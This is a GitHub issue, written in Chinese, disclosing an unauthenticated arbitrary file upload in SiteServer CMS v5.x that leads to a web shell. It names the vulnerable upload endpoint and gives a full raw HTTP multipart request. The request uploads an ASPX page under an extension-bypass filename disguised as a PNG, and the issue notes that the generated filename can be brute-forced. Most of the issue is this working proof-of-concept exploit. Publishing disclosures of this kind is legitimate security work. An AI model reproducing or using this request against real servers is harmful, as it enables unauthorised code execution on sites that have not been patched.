Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

未授权任意文件上传getshell #3236

Open
sobinge opened this issue Oct 15, 2021 · 0 comments
Open

未授权任意文件上传getshell #3236

sobinge opened this issue Oct 15, 2021 · 0 comments

Comments

@sobinge
Copy link

sobinge commented Oct 15, 2021

测试的版本:https://github.com/siteserver/cms/releases/download/siteserver-dev-v5.0.92/siteserver_install.zip
SiteServer:v5.1
测试环境:windows 2012 R2
数据库 sql server 2016
漏洞url:/api/stl/actions/upload/1?type=GovPublicApply
(测试过程中,不需要修改程序任何系统配置)

包体
`POST /api/stl/actions/upload/1?type=GovPublicApply HTTP/1.1
Host: 192.168.39.3:8099
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X_Requested_With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------307288271314916491681521187278
Content-Length: 903
Origin: http://192.168.39.3:8099
Connection: close

-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="id"

WU_FILE_0
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="name"

111.png
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="type"

image/png
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="lastModifiedDate"

2021/10/15 上午10:47:51
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="size"

5720
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="upfile"; filename="111.aasspx"
Content-Type: image/png

<%@ Page Language="C#"%>
<% Response.Write("hello,world"); %>

-----------------------------307288271314916491681521187278--`
image
image
image
生成的aspx文件名是时间戳相关,黑盒测试需要通过暴力猜解可以获取到。

@sobinge sobinge changed the title 任意文件上传getshell 未授权任意文件上传getshell Oct 15, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant